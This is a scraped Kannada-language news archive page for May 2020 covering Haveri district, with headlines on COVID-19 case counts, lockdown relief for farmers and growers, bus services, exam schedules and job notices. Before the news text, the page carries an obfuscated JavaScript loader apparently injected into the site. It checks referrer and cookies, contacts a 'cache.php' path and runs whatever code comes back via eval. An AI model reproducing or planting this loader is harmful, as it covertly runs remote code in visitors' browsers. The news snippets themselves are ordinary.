;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Month: May 2020

ಅರ್ಜಿ ಆಹ್ವಾನ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ಹಾನಗಲ್ ತಾಲೂಕು ಹಿಂದುಳಿದ ವರ್ಗಗಳ ಕಲ್ಯಾಣ ಇಲಾಖೆ ಆಶ್ರಯದಲ್ಲಿ ಹಾನಗಲ್‍ನಲ್ಲಿ ನಡೆಯುತ್ತಿರುವ ಮಹಿಳಾ ಹೊಲಿಗೆ ತರಬೇತಿ ಕೇಂದ್ರದಲ್ಲಿ…

ಕೋವಿಡ್19: ಹಾವೇರಿ ಜಿಲ್ಲೆಯಲ್ಲಿ ನಾಲ್ಕು ಹೊಸ ಪ್ರಕರಣಗಳು ಪತ್ತೆ, ಸೋಂಕಿತರ ಸಂಖ್ಯೆ 14 ಕ್ಕೆ ಏರಿಕೆ

ಹಾವೇರಿ ಜಿಲ್ಲೆಯ ರಾಣೆಬೆನ್ನೂರ ಈಶ್ವರ ನಗರದಲ್ಲಿರುವ ದೇವರಾಜು ಅರಸು ವಸತಿ ನಿಲಯದ ಕ್ವಾರಟೈನ್ ನಲ್ಲಿದ್ದ ನಾಲ್ವರಿಗೆ ಶನಿವಾರ ಕೋವಿಡ್19 ಸೋಂಕು…

ಹೆಚ್.ಟಿ ಹತ್ತಿ ಬೀಜ ಮಾರಾಟ ಮಾಡಿದರೆ ಕಠಿಣ ಕ್ರಮ

ಹಾವೇರಿ: ಹೆಚ್.ಟಿ ಹತ್ತಿಗೆ ಭಾರತ ಸರ್ಕಾರದಿಂದ ಮಾನ್ಯತೆ ದೊರೆಕಿರುವುದಿಲ್ಲ. ಕಾರಣ ಜಿಲ್ಲೆಯಲ್ಲಿನ ಕೃಷಿ ಪರಿಕರ ಮಾರಾಟಗಾರರು ಅನಧಿಕೃತವಾಗಿ ಹೆಚ್.ಟಿ ಹತ್ತಿ…

ಕೋವಿಡ್ ಲಾಕ್‍ಡೌನ್ ಅವಧಿಯಲ್ಲಿ ನಷ್ಟ ಅನುಭವಿಸಿದ ಹಣ್ಣು-ತರಕಾರಿ ಬೆಳೆಗಾರರಿಗೆ ಪರಿಹಾರ

ಹಾವೇರಿ: ಕೋವಿಡ್ -19 ಲಾಕ್‍ಡೌನ್ ಘೋಷಣೆಮಾಡಿದ ಮಾಚ್ 24 ರಿಂದ ಮೇ 17ರವೆಗಿನ ಅವಧಿಯಲ್ಲಿ ಜಿಲ್ಲೆಯಲ್ಲಿ ಹಣ್ಣು ಮತ್ತು ತರಕಾರಿ…

ಲಾಕ್‍ಡೌನ್ ಸಡಿಲಿಕೆ ನಂತರ ಮುಖ್ಯಂಮತ್ರಿಗಳೊಂದಿಗೆ ಚರ್ಚಿಸಿ ಹೊಸ ಮಾರ್ಗಸೂಚಿಯಂತೆ ಬಸ್ ಸಂಚಾರ: ಉಪ ಮುಖ್ಯಮಂತ್ರಿ ಲಕ್ಷ್ಮಣ ಸವದಿ

ಹಾವೇರಿ: ಲಾಕ್‍ಡೌನ್ ಅವಧಿ ಇದೇ ಮೇ 31 ರಂದು ಕೊನೆಗೊಳ್ಳಲಿದ್ದು, ಮುಂದಿನ ದಿನಗಳಲ್ಲಿ ಬಸ್ ಸಂಚಾರ, ಪ್ರಯಾಣಿಕರ ಸಂಖ್ಯೆ ಕುರಿತಂತೆ…

ಪರವಾನಿಗೆ ಇಲ್ಲದ ಖಾಸಗಿ ಪ್ರಯಾಣ ವಾಹನಗಳ ಲೈಸನ್ಸ್ ರದ್ದು: ಉಪ ಮುಖ್ಯಮಂತ್ರಿ ಲಕ್ಷ್ಮಣ ಸವದಿ

ಹಾವೇರಿ: ಕೋವಿಡ್ ಲಾಕ್‍ಡೌನ್ ಸಡಿಲಿಕೆ ನಂತರ ತ್ರೈಮಾಸಿಕ ಯೋಜನೆಗಳನ್ನು ರೂಪಿಸಿಕೊಂಡು ಸಾರಿಗೆ ನಷ್ಟವನ್ನು ಸರಿದೂಗಿಸಿ ಲಾಭ ತರುವ ನಿಟ್ಟಿನಲ್ಲಿ ಇಲಾಖಾ…

ತಂಬಾಕು ಸೇವನೆ ದುಷ್ಪರಿಣಾಮ ಕುರಿತ ಲೇಖನ, ಹಾಡುಗಳ ಆಹ್ವಾನ

ಹಾವೇರಿ: ರಾಷ್ಟ್ರೀಯ ತಂಬಾಕು ನಿಯಂತ್ರಣ ಕಾರ್ಯಕ್ರಮದಡಿ ವಿಶ್ವ ತಂಬಾಕು ರಹಿತ ದಿನಾಚರಣೆ ಅಂಗವಾಗಿ ತಂಬಾಕು ಸೇವನೆಗಳ ದುಷ್ಪರಿಣಾಮಗಳ ಕುರಿತ ಲೇಖನ…

ಮಹಾರಾಷ್ಟ್ರದಲ್ಲಿ ಬೀದಿ ವ್ಯಾಪಾರ ಮಾಡುತ್ತಿದ್ದ ಹಾವೇರಿ ಜಿಲ್ಲೆಯ ನಾಲ್ವರಿಗೆ ಕೋವಿಡ್ 19 ಸೋಂಕು ದೃಢ: ಸೋಂಕಿತರ ಸಂಖ್ಯೆ 10 ಏರಿಕೆ

ಹಾವೇರಿ: ಮಾಹಾರಾಷ್ಟ್ರ ರಾಜ್ಯದಿಂದ ಸೇವಾ ಸಿಂಧು ಪಾಸ್ ಪಡೆದು ಜಿಲ್ಲೆಗೆ ಆಗಮಿಸಿದ್ದ ರಾಣೇಬೆನ್ನೂರು ತಾಲೂಕು ತುಮ್ಮಿನಕಟ್ಟಿ ಗ್ರಾಮದ ನಾಲ್ವರಿಗೆ ಗುರುವಾರ…

ಹಾವೇರಿ ಜಿಲ್ಲೆಯ ಮ‌ೂರನೇ ಕೋವಿಡ್ ಸೋಂಕಿತ ಗುಣಮುಖ: ಆಸ್ಪತ್ರೆಯಿಂದ ಬಿಡುಗಡೆ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ಶಿಗ್ಗಾಂವ ತಾಲೂಕಿನ ಅಂದಲಗಿ ಗ್ರಾಮದ 25 ವರ್ಷದ ಕೊರೊನಾ ಸೋಂಕಿತ ಸಂಪೂರ್ಣ ಗುಣಮುಖವಾದ ಹಿನ್ನಲೆ ಬುಧವಾರ ಜಿಲ್ಲಾ…

ಆಹಾರ ಧಾನ್ಯ ಕಿಟ್ ವಿತರಣೆ

ಹಾವೇರಿ: ಕೋವಿಡ್ 19 ಲಾಕ್‍ಡೌನ್ ಕಾರಣದಿಂದ ತೊಂದರೆಯಲ್ಲಿರುವ ಹಾವೇರಿ ವಿಧಾನಸಭಾ ಕ್ಷೇತ್ರದಲ್ಲಿರುವ ಕಾರ್ಮಿಕರಿಗೆ ವಿತರಣೆ ಮಾಡಲು ಸರ್ಕಾರದಿಂದ ನಾಲ್ಕು ಸಾವಿರ…

ಹಾವೇರಿ ಜಿಲ್ಲೆಯಲ್ಲಿ ಮತ್ತೋರ್ವ ಕೋವಿಡ್ 19 ಸೋಂಕಿತ ಗುಣಮುಖ: ಆಸ್ಪತ್ರೆಯಿಂದ ಬಿಡುಗಡೆ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ಪ್ರಥಮ ಕೊರೊನಾ ಪಾಸಿಟಿವ್ ದೃಢಪಟ್ಟ 32 ವರ್ಷದ ವ್ಯಕ್ತಿಯು ಸೋಂಕಿನಿಂದ ಸಂಪೂರ್ಣ ಗುಣಮುಖನಾದ ಹಿನ್ನಲೆಯಲ್ಲಿ ಮಂಗಳವಾರ ಜಿಲ್ಲಾ…

ಮೆಡಿಕಲ್ ಸೈಂಟಿಸ್ಟ್, ರಿಸರ್ಚ್ ಅಸಿಸ್ಟೆಂಟ್, ಲ್ಯಾಬ್ ಟೆಕ್ನಿಷಿಯನ್ ಹುದ್ದೆಗೆ ನೇರ ಸಂದರ್ಶನ

ಹಾವೇರಿ: ಜಿಲ್ಲಾ ಆಸ್ಪತ್ರೆಯ ಕೋವಿಡ್-19 ವಿ.ಆರ್.ಡಿ.ಎಲ್ ವಿಭಾಗದಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸಲು ಮೆಡಿಕಲ್ ರಿಸರ್ಚ್ ಸೈಟಿಂಸ್ಟ್, ವೈದ್ಯಕೀಯೇತರ ರಿಸರ್ಚ್ ಸೈಂಟಿಸ್, ರಿಸರ್ಚ್ ಅಸಿಸ್ಟೆಂಟ್…

ಹಾವೇರಿಯಲ್ಲಿ ಶುಕ್ರವಾರ ಮೂರು ಹೊಸ ಕೋವಿಡ್ 19 ಪ್ರಕರಣಗಳು ಪತ್ತೆ : ಜಿಲ್ಲೆಯಲ್ಲಿ ಸೋಂಕಿತ ಸಂಖ್ಯೆ 6 ಏರಿಕೆ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯಲ್ಲಿ ಶುಕ್ರವಾರ 3 ಹೊಸ ಕೋವಿಡ್ 19 ಪ್ರಕರಣಗಳು ಪತ್ತೆಯಾಗಿದ್ದು, ಸೋಂಕಿತರ ಸಂಖ್ಯೆ 6 ಕ್ಕೆ ಏರಿಕೆಯಾಗಿದೆ. ಮಹಾರಾಷ್ಟ್ರ…

ಮೇ.31ರ ವರೆಗೆ ಸ್ವಯಂ ಪ್ರೇರಿತರಾಗಿ ಬಟ್ಟೆ ವ್ಯಾಪಾರವನ್ನು ಸ್ಥಗಿತಗೊಳಿಸಲು ವರ್ತಕರ ನಿರ್ಧಾರ

ಸವಣೂರ: ಕೊರೊನಾ ಸೋಂಕು ಹೆಚ್ಚುತ್ತಿರುವ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಪಟ್ಟಣದ ಜವಳಿ ವರ್ತಕರ ಸಂಘದ ವತಿಯಿಂದ ಮೇ.31ರ ವರೆಗೆ ಸ್ವಯಂಪ್ರೇರಿತರಾಗಿ ಬಟ್ಟೆ ವ್ಯಾಪಾರವನ್ನು…

ಜೂನ್ ಮೊದಲ ವಾರದಲ್ಲಿ ಕೋವಿಡ್ ಸೋಂಕು ಪರೀಕ್ಷಾ ಲ್ಯಾಬ್ ಆರಂಭಕ್ಕೆ ಕ್ರಮ: ಗೃಹ ಸಚಿವ ಬಸವರಾಜ ಬೊಮ್ಮಾಯಿ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯಲ್ಲಿ ಕೋವಿಡ್ ಪ್ರಕರಣಗಳನ್ನು ಪತ್ತೆ ಹಚ್ಚಲು ಒಂದು ಕೋಟಿ ರೂ. ವೆಚ್ಚದಲ್ಲಿ ಹೊಸದಾಗಿ ಮಂಜೂರಾಗಿರುವ ಕೋವಿಡ್ ಸೋಂಕು ಪರೀಕ್ಷಾ…

ಹಾವೇರಿಜಿಲ್ಲಾ ಆಸ್ಪತ್ರೆಯಲ್ಲಿ ಕೋವಿಡ್ ಚಿಕಿತ್ಸೆಗೆ 58 ಬೆಡ್‍ಗಳ ವ್ಯವಸ್ಥೆ: ಗೃಹ ಸಚಿವ ಬಸವರಾಜ ಬೊಮ್ಮಾಯಿ

ಹಾವೇರಿ: ಕೋವಿಡ್ ಸೋಂಕಿತರ ಚಿಕಿತ್ಸೆಗೆ ಜಿಲ್ಲಾ ಆಸ್ಪತ್ರೆಯಲ್ಲಿ 58 ಬೆಡ್‍ಗಳ ವ್ಯವಸ್ಥೆ ಮಾಡಲಾಗಿದೆ. ಈ ಮೊದಲು 1ಂ ಬೆಡ್‍ಗೆ ಐ.ಸಿ.ಯು…

ಜೂನ್‌ 25 ರಿಂದ ಎಸ್ಸೆಸ್ಸೆಲ್ಸಿ ಪರೀಕ್ಷೆ: ಪಿಯುಸಿ ಇಂಗ್ಲಿಷ್‌ ಪರೀಕ್ಷೆ ಜೂನ್‌ 18 ಪಿಕ್ಸ್

ಬೆಂಗಳೂರು: ಎಸ್ಸೆಸ್ಸೆಲ್ಸಿ ಪರೀಕ್ಷೆಯನ್ನು ಜೂನ್ 25ರಿಂದ ಜುಲೈ 4ರ ವರೆಗೆ ನಡೆಸಲು ತೀರ್ಮಾನಿಸಲಾಗಿದ್ದು, ದ್ವಿತೀಯ ಪಿಯು ಇಂಗ್ಲಿಷ್‌ ಪರೀಕ್ಷೆ ಜೂನ್…

ರಾಜ್ಯದಲ್ಲಿ ಕೋವಿಡ್-19 ಸೋಂಕಿತರ ಸಂಖ್ಯೆ 1056 ಕ್ಕೆ ಏರಿಕೆ! ಶುಕ್ರವಾರ 69 ಹೊಸ ಪ್ರಕರಣ ಪತ್ತೆ

ಬೆಂಗಳೂರು: ರಾಜ್ಯದಲ್ಲಿ ಕೊರೊನಾ ನಾಗಾಲೋಟ ಮುಂದುವರೆದಿದ್ದು, ಗುರುವಾರ ಸಂಜೆ 5 ಗಂಟೆಯಿಂದ ಶುಕ್ರವಾರ ಸಂಜೆಯವರೆಗೆ 69 ಹೊಸ ಕೋವಿಡ್ ಪ್ರಕರಣಗಳು…

ಹೂವು ಬೆಳೆಗಾರರಿಗೆ ಪರಿಹಾರ ಧನ ನೀಡಲು ಅರ್ಜಿ ಆಹ್ವಾನ

ಹಾವೇರಿ: ಕೋವಿಡ್ ಲಾಕ್‍ಡೌನ್ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ನಷ್ಟ ಹೊಂದಿರುವ ಹೂವು ಬೆಳಗಾರರಿಗೆ ಸರ್ಕಾರ ಪರಿಹಾರ ಘೋಷಿಸಿದೆ. ಹಾನಿಗೊಳಗಾದ ಜಿಲ್ಲೆಯ ಹೂವಿನ ಬೆಳೆಗಾರರಿಂದ…

24 ಗಂಟೆಯಲ್ಲಿ34 ಪ್ರಕರಣ|ರಾಜ್ಯದಲ್ಲಿ ಕೋವಿಡ್-19 ಸೋಂಕಿತರ ಸಂಖ್ಯೆ 959

ಬೆಂಗಳೂರು: ರಾಜ್ಯದಲ್ಲಿ ಮಂಗಳವಾರ ಸಂಜೆ 5 ಗಂಟೆಯಿಂದ ಬುಧವಾರ ಸಂಜೆಯವರೆಗೆ 34 ಹೊಸ ಕೋವಿಡ್ ಪ್ರಕರಣಗಳು ವರದಿಯಾಗಿವೆ. ಇದರೊಂದಿಗೆ ಸೋಂಕಿತರ…

ಹೊರ ರಾಜ್ಯದಿಂದ ಬರುವ ರೈಲ್ವೆ ಪ್ರಯಾಣಿಕರ ಸ್ವೀಕಾರಕ್ಕೆ ಸಿದ್ಧತೆ: ಹೆಚ್ಚುವರಿ ಜಿಲ್ಲಾಧಿಕಾರಿ ಯೋಗೇಶ್ವರ

ಹಾವೇರಿ: ಮುಂಬೈ ರೈಲ್ವೆ ನಿಲ್ದಾಣದಿಂದ ಹಾವೇರಿ ಜಿಲ್ಲೆಗೆ ಬರುವ ಕರ್ನಾಟಕ ರಾಜ್ಯದ ವಿವಿಧ ಜಿಲ್ಲೆಯ ಪ್ರಯಾಣಿಕರನ್ನು ಸ್ವೀಕರಿಸಿ ಎಸ್.ಓ.ಪಿ. (ಕೋವಿಡ್…